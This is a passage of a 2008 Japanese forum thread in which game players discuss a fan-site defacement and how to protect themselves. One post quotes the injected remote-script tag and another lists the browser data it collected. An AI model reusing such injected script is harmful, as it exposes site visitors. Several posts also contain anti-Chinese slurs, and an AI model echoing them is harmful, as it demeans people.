607 :既にその名前は使われています:2008/04/29(火) 14:29:04.94 ID:iVTn03qt
>>606
俺はユーザCNと読んだんだが

608 :既にその名前は使われています:2008/04/29(火) 14:30:04.62 ID:W25uR43K
状況がよくわかっていない>>588に相談するとしたら、
まず状況の説明から始めないといけないわけだがw

609 :既にその名前は使われています:2008/04/29(火) 14:30:05.76 ID:/+W5jyO4
で、結局今回のは直にパスを抜くものでは無いって事でいいんだよな?


610 :既にその名前は使われています:2008/04/29(火) 14:30:15.09 ID:OrYeYIjV
前回はヴァナモンの管理人が運営してる fc2 上のブログがクラックされて、
vanamon.com がクラックされたんじゃないのね。
vanamon.com がクラックされたのは、はじめてなのかー

じゃあなんだろう、可能性として考えられるのは、こんなかんじかな?

管理人の PC にトロイの木馬とかルートキットが仕込まれていて、 vanamon.com
の管理用のパスとかぬかれてるとか?

vanamon.com の php スクリプトに脆弱性があって、そこをつかれたとか?


611 :既にその名前は使われています:2008/04/29(火) 14:31:04.14 ID:vAJKWX/v
念のためにパス変更しておいた方がいいかも?
あとは出来る限りこまめに様子見ていただくとかなのかなあ

よく利用させていただいてるので、がんばってくださいませ

612 :既にその名前は使われています:2008/04/29(火) 14:32:57.52 ID:B+FyjPLx
事件はリアルタイムに祝日に起こっている・・・

613 :既にその名前は使われています:2008/04/29(火) 14:34:50.40 ID:IyychiVx
GWねらい

614 :既にその名前は使われています:2008/04/29(火) 14:35:02.65 ID:IyychiVx
あげ

615 :既にその名前は使われています:2008/04/29(火) 14:35:15.06 ID:vAJKWX/v
ただ今回のはあきらかなJPねらいだな

NA、EUにはゴールデンウイークはないし

616 :既にその名前は使われています:2008/04/29(火) 14:36:03.34 ID:xelVa9Nv
Σ(゚Д゚)ナ、ナンダッテー

617 :既にその名前は使われています:2008/04/29(火) 14:36:07.72 ID:D+pLk1zn
ノートン反応しなかった
ノートン氏ね


618 :既にその名前は使われています:2008/04/29(火) 14:38:39.25 ID:tJSRB5j8
>>576
安くて絶対安定PS2BBオヌヌメ。

619 :既にその名前は使われています:2008/04/29(火) 14:41:43.17 ID:hfXzCGjY
>>618
そしてソニータイマーで死亡

620 :既にその名前は使われています:2008/04/29(火) 14:42:40.34 ID:YnJ8eL68
xreaというと先日の獣Wikiもそうだった様な。
んで改竄がレベル帯だったのも似た手口。
FC2と同じでxreaが運営管理しているサーバは改竄出来るってことなんじゃない?

でも獣はWikiだからなぁ、と思って今の獣Wiki見てみたら
レベル帯のリンクは編集対象外?みたいだね。
移転前のxreaの時も同じだったかはもう分からないけど。

621 :既にその名前は使われています:2008/04/29(火) 14:42:40.41 ID:sJegpRVf
>>485

  アカを止めて一秒 業者真剣な目をしたから
  そこから何も物無くなるの ハイダテロンリーネス キンッ

  きっと愛するキャラを大切にして 知らずに消えてゆくのね
  sage sundiも見ないふり

  アカハックやワープでクエを あと何回こなせば
  二人は触れ合うの
  お ね が い ハック ハック ここにハック
  業者から ハック 手を伸ばして 受け取ってよ
  プレイオンラインのIDパス

  ヴァナモン見ればキャラクターなんて 知らずに消えてゆくのに
  sage sundiは見ないふり

こう言う事か

622 :既にその名前は使われています:2008/04/29(火) 14:43:25.24 ID:/EwYiIz/
とりあえずここで何度も出ているPG2を導入を必ず行って
ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html ←リネージュ資料室
ここを見ればPG2導入方法とIPブロックの設定、危険IPリストが出ているから見ながらやれば初心者でも出来る。
私自身がまだ初心者レベルだから他の人でもできるはず。
で、私が使ってるウィルスバスターはセキュリティ知識豊富な人には
あまり評判よろしくないようだけど使っている人多いと思うので、
1.メイン画面>アップデート/その他>パスワード
で、まずはウィルスバスターの操作パスを設定。
2−1.メイン画面起動>フィッシング詐欺/迷惑メール対策>URLフィルタのボタンを「有効」に設定
2−2.フィルタ設定画面を開いてパス入力>URLフィルタを有効にする、のボックスにチェックを入れる
2−3.「禁止するウェブサイト以外は..」のボックスにチェック>禁止するウェブサイトの設定画面を開く
2−4.追加ボタンを押してアドレス設定「http://cnzz.com/」と入力してOKボタンを押す
これは今回のやつだけしか効果ないから危険なURL情報があったらそのつど追加する必要あります。
出来れば「許可するウェブサイト以外はアクセスを全て禁止する」にチェックしたほうがセキュリティはより高いです
長くてバスター利用者限定の内容で申し訳ないですが初心者の被害防ぐための方法の1つとして許してください。

623 :既にその名前は使われています:2008/04/29(火) 14:46:28.84 ID:q3xeuydG
fc2のときと同じく、今回のクラックもHPの管理パスが抜かれたとか管理人の
セキュリティが甘かったとかのレベルの話ではなく、さらに上位の鯖へのクラック
だと思うよ。
ウイルスバスターの公式HPだって改竄するような奴らなんだから、一般のレンタル鯖
くらいなら普通にクラックできそう

624 :既にその名前は使われています:2008/04/29(火) 14:46:58.09 ID:/EwYiIz/
ごめん、危険なサイトのアドレスがリンクになってしまった。
上に出てる「cnzz●com」はリンクは危険なので絶対飛ばないでください。
申し訳ないです・・

625 :既にその名前は使われています:2008/04/29(火) 14:49:48.94 ID:BAB4lPDe
人気サイトは大変だな

626 :既にその名前は使われています:2008/04/29(火) 14:51:38.67 ID:efvHHwLk
ヴぁなもんだったから発見がはやかったかもしれないが
微妙な中堅どころのサイトが次々とハックされたら気がつくのが遅れて大変かもな

627 :既にその名前は使われています:2008/04/29(火) 14:58:43.39 ID:WcBUBXPW
PG2を入れてIP拒否っても
日本のサイト自体にウィルス埋め込まれたら結局セキュリティソフトの出番だよな

628 :既にその名前は使われています:2008/04/29(火) 14:59:25.62 ID:f0770pmx
火狐とNoScript入れてるけど、例えばnicovideo.jpが禁止されてて、
これにウィルス入ってたら許可しちゃった時点でもうダメなのかな?
ほとんどのサイトが見れなくて不便

>>622
fc2ブログの時に火狐とNoScriptにしたが、PG2ってのは初めて聞いた
それ入れとくわ


629 :既にその名前は使われています:2008/04/29(火) 15:00:57.78 ID:wzizoZUw
つうか、思ったんだけどさ今回の手口ってPCじゃなくて
最終的にはルーターのハッキングを狙ってるんじゃね?

630 :既にその名前は使われています:2008/04/29(火) 15:01:54.01 ID:YHamIyYW
青魔さんとこも2回改竄されてたよね、ブログ。対策していてもやられて、未だに解明できてないって書いてなかった?

631 :既にその名前は使われています:2008/04/29(火) 15:03:35.16 ID:PonyOLP4
PG2が落とせないんだがw
ページが見つかりません!

632 :既にその名前は使われています:2008/04/29(火) 15:04:34.30 ID:PYeSXpOU
古いFF動かない端末にコピーだけして、IDやらPWやらを無理やり「64TiananmenMassacre」に
したダミーを設置
その後踏みまくってお持ち帰りしてもらってみたが・・・
どうなったんだろうなw

633 :既にその名前は使われています:2008/04/29(火) 15:09:04.05 ID:W25uR43K
>>629
ルーターハックしてもPOLパス抜けないし
FFXIのアカウント狙いかと思ってたけど?

634 :既にその名前は使われています:2008/04/29(火) 15:09:14.84 ID:f0770pmx
とりあえず今ヴァナモン見ても平気?
トップページだけ見ようかなと
管理人さんなんか書いたんでしょ?

635 :既にその名前は使われています:2008/04/29(火) 15:10:49.18 ID:PtxRJ5q0
で、今回のをまとめるとだ
パス抜きではないって事か?


636 :既にその名前は使われています:2008/04/29(火) 15:12:36.38 ID:LApS/Mnz
昨日ちょうどこのスレたった時間にヴァナモンみてしまって
あわててカスペルキーでスキャンしたけどなにもでてこなかった
これって大丈夫なの??

637 :既にその名前は使われています:2008/04/29(火) 15:13:44.27 ID:B+FyjPLx
カスペル先生がまだ対応してないのかも

638 :既にその名前は使われています:2008/04/29(火) 15:19:14.42 ID:OqePFS4f
>>631
日本語版と日本語マニュアルのHPは今みることができない
英語版を入れましょう

639 :既にその名前は使われています:2008/04/29(火) 15:21:18.66 ID:QB3mhR2y
>>636
今回のは直接ウィルスしかけてる訳じゃない
ただし君のPCの情報は中華に送られている

640 :既にその名前は使われています:2008/04/29(火) 15:22:43.77 ID:G3Dfz9qs
>>631
cowscorpionあたりに置いてなかったっけ?

641 :既にその名前は使われています:2008/04/29(火) 15:22:53.11 ID:PYeSXpOU
FF系のサイトはVisualPC経由で見るようにしたらいいんじゃない?
抜く情報無いし

642 :既にその名前は使われています:2008/04/29(火) 15:23:39.48 ID:PYeSXpOU
ちがた
VirtualPCだた

643 :既にその名前は使われています:2008/04/29(火) 15:25:29.90 ID:dGWRi6Vr
>>630
おまえ上のほうのレス読んでないだろ。
fc2ユーザーでなく、fc2本体に不備があったから改竄されたんだ。
だからfc2ユーザーでどうこう出来るレベルではなかったということだよ。

644 :既にその名前は使われています:2008/04/29(火) 15:28:14.26 ID:MXsgIArg
>>639
どうゆうこと?

645 :既にその名前は使われています:2008/04/29(火) 15:29:20.90 ID:vAJKWX/v
>>644
スレを1から読めばわかる

646 :既にその名前は使われています:2008/04/29(火) 15:29:50.15 ID:FiOSq+zB
>>644
なんか情報を集めてるみたいだね
で、もろい所があったら、後で集中して狙うって事じゃない?

647 :既にその名前は使われています:2008/04/29(火) 15:31:51.58 ID:vAJKWX/v
とりあえずトップ目立つ注意書きになってますね、お疲れさまっす

648 :既にその名前は使われています:2008/04/29(火) 15:32:19.19 ID:eV4Ok9nb
>>638
見れなくなったのっていつ頃?
なんかタイミングがいいな

649 :既にその名前は使われています:2008/04/29(火) 15:33:44.11 ID:dGWRi6Vr
cnzz.comは現在情報収集しているだけで
まだ目立った活動はしていないということだな。
Xデーに向けてセキュリティの甘いPCを探し回っているんだろう。

650 :既にその名前は使われています:2008/04/29(火) 15:37:05.22 ID:LZ9pAyLi
今回の流れ
・罠サイトを踏む

・以下の情報をcnzz■comにIMGタグのオプションとして送る  ←いまここ
 navigator.userAgent ユーザーエージェント取得
 document.referrer リンク元URL
 navigator.appName ブラウザ識別(IE ネスケ等)
 navigator.systemLanguage システム言語
 navigator.platform プラットフォーム識別(Win32 MacPPC等)
 navigator.appVersion ブラウザ識別(IE version等)
 screen.width 画面幅
 screen.height 画面高さ

・人の多そうな環境に対するウィルスを撒き散らす

・ハックうま〜〜

こんな流れ?でいいのかな?

651 :既にその名前は使われています:2008/04/29(火) 15:47:41.54 ID:YHamIyYW
>>643
いや、ちゃんと読んでます〜><でも、変な尻切れトンボな書き方してすみません
ただ、ブログの記事「FC2からの公式報告」でFC2さんからは公式に不備がありました云々の
返事がなかったらしいので(深読みすればそうともとれる内容らしいですが)
トップに告知きてるなら、ユーザーはそれ読んで事の真相を理解してね!って感じなのかな

652 :既にその名前は使われています:2008/04/29(火) 15:49:29.91 ID:pSrSdORS
とりあえずPOLパス変更してみた
が、オートログインで前のパスのままだったので最初入れなくてちょっとびびったw

653 :既にその名前は使われています:2008/04/29(火) 15:49:54.80 ID:5hYmJxCw
やっぱPOLのオートログインはまずいか・・・

654 :既にその名前は使われています:2008/04/29(火) 15:50:01.80 ID:kLse6GM8
今回のウィルスはOS、IP、ブラウザ情報を中国に送るだけなので
27日以降にヴァナモン見た奴は、とりあえずパスワード変更とファイアーウォールソフトで防御しとけばOK

655 :既にその名前は使われています:2008/04/29(火) 15:52:35.41 ID:1zL4K1Ex
わからんぞ?情報送るだけって言ってる奴はシナ畜で
本当は何かを仕込んであり、パス変えると良いよ^^
といい、入力したパスを送信^^な事もあるかもしれない

656 :既にその名前は使われています:2008/04/29(火) 15:55:15.00 ID:ew0Q5C/A
PG2起動しながらFFする為には
どの範囲のIPを許可すればいいのん?

657 :既にその名前は使われています:2008/04/29(火) 15:55:51.19 ID:dGWRi6Vr
>>655
まあそういう可能性も0ではないが、
その程度の真偽も見抜けんようでは
ネット使わない方がいいんじゃないって話だな。

658 :既にその名前は使われています:2008/04/29(火) 15:57:20.92 ID:MoMvCX2T
>>657
発覚されるまで仕込んどいて、表沙汰になったら
変えるってのもありそうだけどなw

659 :既にその名前は使われています:2008/04/29(火) 15:58:29.16 ID:OqePFS4f
>>648
いつから見られないんだろね
うちでは以前から本家の英語版で運用してるので分からないんだ


660 :既にその名前は使われています:2008/04/29(火) 15:58:55.78 ID:QB3mhR2y
>>656
日本のIPまで弾いてんのか?
■の鯖が中国にあるなんてことない訳だし、中国のIP弾いておけばいい

661 :既にその名前は使われています:2008/04/29(火) 16:00:32.23 ID:bKVoid2q
とりあえず28日の夕方には見れなくなってたはずのぜ?

662 :既にその名前は使われています:2008/04/29(火) 16:01:18.62 ID:8LsPBR2P
>>656
■PG2用 FF許可リスト■
SQUARE:61.195.57.130-61.195.57.162
SQUARE ENIX:202.67.48.52-202.67.48.52
SQUARE ENIX:202.67.52.0-202.67.52.255
SQUARE ENIX:202.67.56.0-202.67.56.255
SQUARE ENIX:219.117.152.123-219.117.152.126


663 :既にその名前は使われています:2008/04/29(火) 16:01:23.43 ID:J9/RYjOR
>>661
なーーんか、良いタイミングだなw

664 :既にその名前は使われています:2008/04/29(火) 16:03:55.98 ID:tJSRB5j8
細々と設定必要なソフトでもないから英語版使っとけ。

665 :既にその名前は使われています:2008/04/29(火) 16:06:09.89 ID:ew0Q5C/A
>>660
スパム送るところとか広告とかそういうIP不許可にしてあるから

>>662
サンクス

666 :既にその名前は使われています:2008/04/29(火) 16:08:40.16 ID:QB3mhR2y
http://miku.a.orn.jp/miku6/index.html
こんなサイトあるのね、ねこもでもわかる略PeerGuardian2
PG2使ってないから知らなかったが初期設定だとPOLも弾くのか
失礼しました

667 :既にその名前は使われています:2008/04/29(火) 16:08:43.90 ID:dcZIk1nW
どなたか、中国のIPリストおよび中国の運営してるサイトのIPリストを持ってる方いませんか?
自前のプロキシ鯖の拒否リストに加えておきたいので・・・・

668 :既にその名前は使われています:2008/04/29(火) 16:09:11.71 ID:u3GPKzxb
ヴァナモン本人の書き込み>>539
> 4/27 23:26-23:31の間に3つのファイルが書き換えられていた。
とあるけど、つまりこの時間以降にサイト見てたらアウトってこと?

669 :既にその名前は使われています:2008/04/29(火) 16:12:39.01 ID:dcZIk1nW
と思ったら
http://lineage.paix.jp/guide/security/virus-url.html
にありますね。サーセンwwww

しかしこれだけあるとプロキシのメモリ増えるな・・・めんどくせー

670 :既にその名前は使われています:2008/04/29(火) 16:22:16.62 ID:AhAgEQSw
カスペルは普通に使ってるけど、オンラインスキャン版はどのぐらいの機能なの?

これ設定項目が色々とカスタマイズできるし、あんまり分からない人にオススメ出来る物じゃないから
オンライン版を過信しちゃうのもどうかと思う。

671 :既にその名前は使われています:2008/04/29(火) 16:27:03.63 ID:tJSRB5j8
>>668
パスとか抜かれてないが環境情報を送られてる可能性がある。

672 :既にその名前は使われています:2008/04/29(火) 16:28:04.57 ID:dGWRi6Vr
>>668
yes。
まあブラウザの設定でむやみにスクリプト読み込まないように
してる人も居るから、全員が全員アウトというわけではない。

673 :既にその名前は使われています:2008/04/29(火) 16:34:15.56 ID:WcBUBXPW
カスペ入れてから攻撃遮断ログ流れまくるのな
これ表示させない方法教えて

674 :既にその名前は使われています:2008/04/29(火) 16:44:43.86 ID:u3GPKzxb
>>671,672レスさんくす
俺がサイト見たのはその時間以前で、ブラウザもオペラでJavascriptとiframe設定offにしてた。
でも念のためスキャンしておいた。

675 :既にその名前は使われています:2008/04/29(火) 16:45:01.49 ID:iO2ahG8l
オンラインスキャンってウィルスじゃないのにウィルスだぜって検出される事ってある?

676 :既にその名前は使われています:2008/04/29(火) 16:56:34.53 ID:unY3VG/U
そりゃあるだろ。機械だもの。

677 :既にその名前は使われています:2008/04/29(火) 16:58:55.83 ID:1pGcl48a
みつを

678 :既にその名前は使われています:2008/04/29(火) 17:05:32.12 ID:tH9sscyB
学校でこのスレ発見して
パス変えたくても変えられないかったときは
マジ泣きそうになったわ
帰ってきて見てみたら何もとられてないようで速攻でパス変更して安心した
ヴぁなもんも被害者なんだよな
なんともいえねーが中華うぜえ

679 :既にその名前は使われています:2008/04/29(火) 17:06:02.16 ID:OqePFS4f
>>670
スキャンできるだけ

>>675
釣れますか?


680 :既にその名前は使われています:2008/04/29(火) 17:07:10.88 ID:dGWRi6Vr
>>675
コンピューターウィルスの定義が人によってまちまちだからな。
セキュリティソフト作ってる会社の考え方の違いで、
Aというプログラムを有害判定したりしなかったりすることはよくある。

クッキー追跡ソフトを有害判定するかどうかなんかその最たる物。

681 :既にその名前は使われています:2008/04/29(火) 17:07:26.79 ID:U0Uwhqe2
Macの私はどうしたらいいですか><


682 :既にその名前は使われています:2008/04/29(火) 17:08:38.80 ID:eCdIDBud
もう日本中のルータで中華IPブロックしてほしいわ

683 :既にその名前は使われています:2008/04/29(火) 17:09:49.80 ID:P+JVKcFa
>>627
国内鯖でウィルスやパス抜きなら逮捕可能

684 :既にその名前は使われています:2008/04/29(火) 17:13:43.06 ID:+GNBdofq
>>678
今後の為に学校のパソコンにPOLをインサートDAZE!!



携帯ですか、そうですよね。

685 :既にその名前は使われています:2008/04/29(火) 17:16:37.09 ID:hrZ3m4Az
支那って有数のオンゲ大国でもあるけど、垢ハックも多いのか
それとも、日本やNA、EUだけを狙い撃ちにしてるん?


686 :既にその名前は使われています:2008/04/29(火) 17:18:15.35 ID:jgG6Mzcy
>>670
どこのでもそうだけど、製品版には及ばない。
IEのActiveXコントロールで触れる範囲だから
それ以前のWindows起動時にrootkitっぽく姿を隠す奴には微妙。

687 :既にその名前は使われています:2008/04/29(火) 17:18:41.99 ID:dGWRi6Vr
>>685
当然同国人でも容赦ない。
彼らが信用しているのは血と金だけ。

688 :既にその名前は使われています:2008/04/29(火) 17:19:12.66 ID:XQ3yZ3Ma
意外に伸び悪いな

フレには言ったが知らない奴多そうだなぁ・・・

689 :既にその名前は使われています:2008/04/29(火) 17:19:12.44 ID:jgG6Mzcy
>>685
世界中に無差別。日中韓だけじゃなく欧米含めてね。

690 :既にその名前は使われています:2008/04/29(火) 17:29:50.58 ID:1++MKKCY
一応パス変更
キーロガーも怖いから、ソフトキーボードで('A`)
なんで普通にHP見てるだけでこんな事をせないかんのやら・・・・
シナ畜死ね

691 :既にその名前は使われています:2008/04/29(火) 17:30:56.98 ID:i8uc9VbJ
>>684
祝日に学校とは理系の院生かね

692 :既にその名前は使われています:2008/04/29(火) 17:31:34.82 ID:tJSRB5j8
>>681
垢スレで盛んにMACを布教してた彼は、三度目の感染で布教するの止めたよ。

693 :既にその名前は使われています:2008/04/29(火) 17:32:27.46 ID:jgG6Mzcy
>>92 の vanamon.com/top.htm 誰か保存してない?
キャッシュの内容でもいいんだけど。

694 :既にその名前は使われています:2008/04/29(火) 17:32:29.67 ID:eCdIDBud
>>685
国内でやると当局に目を付けられるから、外国のオンゲばかり狙ってるんじゃない?
そもそも中国人カモっても儲からんだろw

695 :既にその名前は使われています:2008/04/29(火) 17:33:03.94 ID:/jqggqRZ
LSメッセージに注意喚起書いといた
周囲に被害が出るのも辛いからな

696 :既にその名前は使われています:2008/04/29(火) 17:36:06.98 ID:mmDp4qu/
う〜ん、FireFox入れてみたけどどうにもかゆい所に手が届かない感じで
常用する気になれないなあ。とりあえずFF関係だけはこっちにするけど。

スクリプト切ってると不便って人が結構いるみたいだけど、上で何度か名前出てる
スレイプニルだと1クリックであらかじめ設定してあるセキュリティ状態の切り替えが
できるからそうでもないよ。
javasprictが〜、とかActiveXが〜って出たらざっとページ見て必要そうだったらポンって
再読み込みするだけだし。
最低限の対策とすらいえるか分からないけど、プニル使ってて知らない人はまあせめても。

697 :既にその名前は使われています:2008/04/29(火) 17:36:37.80 ID:+GNBdofq
>>694
ゲーム内のアイテムには国なんて関係ないだろw
中国人からアイテムせしめて日本人に売るなんてありそうな構図じゃないか。
まぁあちらさんに不正アクセス禁止法にあたる法律があるかは知らないけど。

698 :既にその名前は使われています:2008/04/29(火) 17:38:02.61 ID:eCdIDBud
そういえば■って、こういった行為に「中国人が」関与してるって
言明したことあったっけ?
「サービス対象外の国から何で被害受けるのか」と危機管理能力の無さを
指摘されるのを恐れているんだろうか。

699 :既にその名前は使われています:2008/04/29(火) 17:41:53.54 ID:aOlcx3QB
法があろうが愛国無罪だろw

700 :既にその名前は使われています:2008/04/29(火) 17:42:58.63 ID:jgG6Mzcy
>>694
いやあっちも国内で共食いしてるよ。
中国では武侠系と言われる三国志みたいな時代設定の
対人重視のMMOのが主流だから
海外とではゲームそのものが違って話題にならんけど。

世界中にばら撒かれたインジェクション(2117966、414151、
nmidahena、nihaorr1、aspder、etc.)で使われる脆弱性を調べると
中国でしか使われていないActiveXコントロールが半分以上あったりする。

701 :既にその名前は使われています:2008/04/29(火) 17:44:24.35 ID:tJSRB5j8
>>696
っnoscript

702 :既にその名前は使われています:2008/04/29(火) 17:44:31.77 ID:QICTtHxo
FFに限らず、中華?によるサイト改竄って世界規模で大流行してるのよね?
国際圧力で中国版不正アクセス禁止法作らせて、当局が取り締まり開始するまで
いたちごっこなのかな・・・・
いつになるやら ┐(゜〜゜)┌

703 :既にその名前は使われています:2008/04/29(火) 17:49:09.98 ID:tJSRB5j8
ん十年世界に海賊版を撒き散らして非難轟々なのに一切知らない顔してる連中だよ。


704 :既にその名前は使われています:2008/04/29(火) 17:51:42.80 ID:FISOh32K
PG2日本語化のとこ復活したよ

705 :既にその名前は使われています:2008/04/29(火) 17:56:30.49 ID:hUj/wi+V
9割方中国だろうけど、これだけ目立ってくれると
残りの1割はやり易そうだなw

706 :既にその名前は使われています:2008/04/29(火) 18:00:53.53 ID:dzkH3QC4
注意喚起age


707 :既にその名前は使われています:2008/04/29(火) 18:04:36.56 ID:1MR6asMf
2chのネトゲ系板のデフォルト名無しは全部
「天安門さん」か「Free Tibetさん」にするべきだと思うんだ

708 :既にその名前は使われています:2008/04/29(火) 18:06:36.11 ID:6tHp5lDN
>>707
おでん(not odin)が増えるだけなんだぜ。しかもネカフェからっぽいのが

709 :天安門さん:2008/04/29(火) 18:10:52.11 ID:UXOVH0xZ
これは踏んだかもしれない

710 :既にその名前は使われています:2008/04/29(火) 18:11:01.55 ID:unzBsdkq
そういやパクリーランドのことTVで見たの、ちょうど去年のGWだったな
とふと思い出してみた


711 :既にその名前は使われています:2008/04/29(火) 18:11:58.14 ID:wQ5uMnV3
PerrGuardian2いれたら
Wikipediaもはじかれたぞwwww
韓国のサイトかよwwwwwwwwwww

712 :既にその名前は使われています:2008/04/29(火) 18:12:07.52 ID:RMqQzbTV
ウイルスバスターでなんも出ないから普段は安心してたんだが
このスレみて不安になってカスペのオンラインスキャンしたら…
2個見つかりやがった。チクショウめ。

713 :既にその名前は使われています:2008/04/29(火) 18:12:59.43 ID:2d/6+V5E
>>693

<script src='hxxp://s111■cnzz■com/stat■php?id=508863&web_id=508863' language='JavaScript' charset='gb2312'></script>

714 :既にその名前は使われています:2008/04/29(火) 18:12:59.53 ID:iY9VE/Aq
>>708
どういう意味?

715 :既にその名前は使われています:2008/04/29(火) 18:13:49.05 ID:+GNBdofq
>>712
俺も1つ出たw

716 :既にその名前は使われています:2008/04/29(火) 18:15:01.06 ID:jgG6Mzcy
>>650
アカハックスレでも書いたけどcnzzはただのアクセス解析なんよ。
top.htmの中身が単にcnzzだけならハッカーは仕込みに失敗していると思う。
WinXP+IE6が最大多数なのは奴らだって知っているから
アカハックのためだけに改めて情報を集める意味は無い。

717 :既にその名前は使われています:2008/04/29(火) 18:16:54.33 ID:tGFX2woT
>>711
wikipediaは韓国に鯖置いてるからな

718 :既にその名前は使われています:2008/04/29(火) 18:17:13.19 ID:jgG6Mzcy
>>713
ありがとう。仕込み失敗してるくさいね。

719 :既にその名前は使われています:2008/04/29(火) 18:18:49.72 ID:infg+3MU
うpだてしてるなら、IEは勝手に7にならないか・・・?
うちだけ?

720 :既にその名前は使われています:2008/04/29(火) 18:18:58.45 ID:J81Z64Pn
まさか、本体にまで仕込んできたか・・・・
仕込み失敗したか、これでどれぐらい引っかかるか調べてるだけのような気がする



721 :既にその名前は使われています:2008/04/29(火) 18:20:51.99 ID:AQOMprhH
PG2いれたんだが予想以上にめんどいな設定
ff11起動したらブロックされ
ログインサーバーアクセスしたらブロックされ
サーチしたらブロックされ
一個ずつ解除してようやく普通にできそうだけど
リンバスとかアサルトとかのコンテンツやるときまたとまりそうで
こわいわ

722 :既にその名前は使われています:2008/04/29(火) 18:22:17.16 ID:tJSRB5j8
>>719
IE7はXP以上。
IE7自体がタコでIE6のままの人も多いよ。

723 :既にその名前は使われています:2008/04/29(火) 18:22:24.53 ID:6tHp5lDN
>>711
いまさら何を・・・w
この2chだってアメリカだしな

>>712
その出た奴を詳しく

>>714
旧獣WiKiで天安門とか書いてても日本から書き換えてたのさ。
それの代表がODN。通称おでん。
http://jbbs.livedoor.jp/bbs/read.cgi/game/6954/1139565264/407-409みたいな話があるわkで


724 :既にその名前は使われています:2008/04/29(火) 18:23:41.76 ID:jgG6Mzcy
>>719
さすがに影響が大きいので入れるかどうか聞いてくる。
ttp://www.microsoft.com/japan/windows/products/winfamily/ie/au/
「インストールする」を反射的に押して
押したことすら覚えていないなら別な意味で危ないぞ。

725 :既にその名前は使われています:2008/04/29(火) 18:23:59.15 ID:iY9VE/Aq
IEw使ってたおめでたい俺だがFireFoxに乗り換えた。
カスペルオンラインスキャン、SpyBotスキャンしてPS2でパス変更しておけば大丈夫だろうか?
対策ソフトはAVAST毎日更新してる。

726 :既にその名前は使われています:2008/04/29(火) 18:25:21.79 ID:kYnZAPNH
>>725
あとPG2と、NoScript、AD-Awareも入れとけ

727 :既にその名前は使われています:2008/04/29(火) 18:27:50.71 ID:jgG6Mzcy
老婆心だが、avast!やAVGやBitDefenderを使うなら
AntiVirを強くすすめる。性能や新種への対応速度で
Kasperskyに唯一対抗できると思う。日本語版は無いけど。

728 :既にその名前は使われています:2008/04/29(火) 18:27:51.02 ID:vQDV6n9U
>>721
P2Pブロックのチェック外すだけで国産ネトゲは大丈夫なはずだが
リネ資料室の説明どおりにやったのか?

729 :既にその名前は使われています:2008/04/29(火) 18:29:27.86 ID:iOHv4cxI
■相次ぐWeb改ざん,いったい何が起こっているのか
ttp://itpro.nikkeibp.co.jp/article/OPINION/20080403/297948/

■Webサイトの改ざん攻撃が拡大、世界で数十万ページが被害
ttp://www.itmedia.co.jp/news/articles/0804/25/news020.html

730 :既にその名前は使われています:2008/04/29(火) 18:31:46.10 ID:+rUCpUjc
DukeDogDukedom
http://www.dukedog.flnet.org/trans.html

PeerGuardian 2 for Windows β6b 日本語第2版 2000・XP・2003用(直リンク)
http://www.dukedog.flnet.org/cgi-bin/Statistics/dl.php?dl=pg2-050918-nt-jp

Cow&Scorpion
PeerGuardian 2 RC1 Test2-2
http://cowscorpion.com/Firewall/PeerGuardian.html

アルテック
PeerGuardian 2.0 Beta 6c
http://www.altech-ads.com/product/10002223.htm

731 :既にその名前は使われています:2008/04/29(火) 18:32:13.71 ID:6tHp5lDN
>>721
>>662をテキストにコピペして許可リストとして設定すれば楽だぞ

732 :既にその名前は使われています:2008/04/29(火) 18:32:35.98 ID:infg+3MU
>>724
大丈夫、自分で入れた

733 :既にその名前は使われています:2008/04/29(火) 18:35:03.47 ID:98AojSCp
IE7なのかおれのパソコンだけなのかわからんけど
検索してたまーにブログの名前のしたに
このサイトはコンピュータに危害を与える可能性があります。ってでるよ
垢ハックなのかしらんけどw狐もでるんかな?

734 :既にその名前は使われています:2008/04/29(火) 18:35:53.37 ID:RMqQzbTV
>>723
すまん、素人な上に消してしまったから詳しく分からんが
検索した履歴に残ってるのはExploit.HTML.Mhtってやつ。

検索したらWebページがどうとか書いてるから…怖いわ。
カスペ本格導入することしにした。バスターはもう使わん…。

735 :既にその名前は使われています:2008/04/29(火) 18:38:06.62 ID:98AojSCp
いまaguseで>>733で出てきたサイトみたけどなにもでてこなかった
でも地図は中国にいってるwwwwww
aguseじゃだめなんかな???

736 :既にその名前は使われています:2008/04/29(火) 18:38:21.76 ID:AQOMprhH
>728
リネ資料室のPeerGuardian2の項目のとこやって
危険urlのファイル登録して
pol立ち上げたらPG2にブロックログが…
んで>662のやつを許可に登録したんだが
サーチ失敗したからみたら PG2のウィンドウにブロックログがあtt
なんかおかしいことしたおぼえもないんだけどなー

737 :既にその名前は使われています:2008/04/29(火) 18:41:15.07 ID:J81Z64Pn
スクエアのアドレスってPGデフォルトの反P2Pに入ってたよな?
たしか俺のもそれ外したら通常通り動いた

738 :721:2008/04/29(火) 18:44:21.43 ID:AQOMprhH
言葉がたりんな・・
>>662のを登録したら
polの立ち上げはいったんだけど
ログインサーバーアクセスでブロックされて
そこでブロックされたのを許可して
キャラログインできた。
んでサーチをたまたましたら失敗するから 
PG2見たら ブロックされていたと。
うーむ

739 :既にその名前は使われています:2008/04/29(火) 18:44:24.64 ID:ew0Q5C/A
>>731
>>662だけじゃ駄目だった

740 :既にその名前は使われています:2008/04/29(火) 18:44:28.23 ID:TWwisaod
>>733
googleがiframeやスクリプトで罠サイトに飛ばすソースがあるところに
自動で警告を出してるんだと思う。
一旦危険と認定されたら解除の申請をしないとずっとそのままになるんだったかな

741 :既にその名前は使われています:2008/04/29(火) 18:45:41.45 ID:ew0Q5C/A
まぁ、データロード入った時にブロックログが大量でて分かりやすいので
それをFF用の許可リストに随時書き込んでる

742 :既にその名前は使われています:2008/04/29(火) 18:45:51.46 ID:tJSRB5j8
反P2Pの有無がわからんし設定ファイルをブロックにチェックしてるってオチない?

743 :既にその名前は使われています:2008/04/29(火) 18:46:07.56 ID:tf3qI5Ww
>>1
ヴァナモンって実は中華と提携してるんじゃないの?

744 :既にその名前は使われています:2008/04/29(火) 18:46:41.26 ID:F4k8DTmL
不正アクセス対策
http://www.playonline.com/ff11/rule/uacs01.html

▼心配な方は下記へ
スクウェア・エニックス インフォメーションセンター
電話番号0570-003-399 PHSからは03-5333-1860
月曜〜金曜 11:00〜19:00(土・日・祝・当社指定休日を除く) 

*プレイオンラインIDをご用意のうえおかけください。
*番号のおかけ間違いにご注意ください。


745 :721:2008/04/29(火) 18:47:16.39 ID:AQOMprhH
>>737
mjd!?
それが原因ぽいな
最初の設定のときにブロックするようしたから
そのせいっぽいわ
ちょっと様子見てみる

アドバイスくれたメンツthx

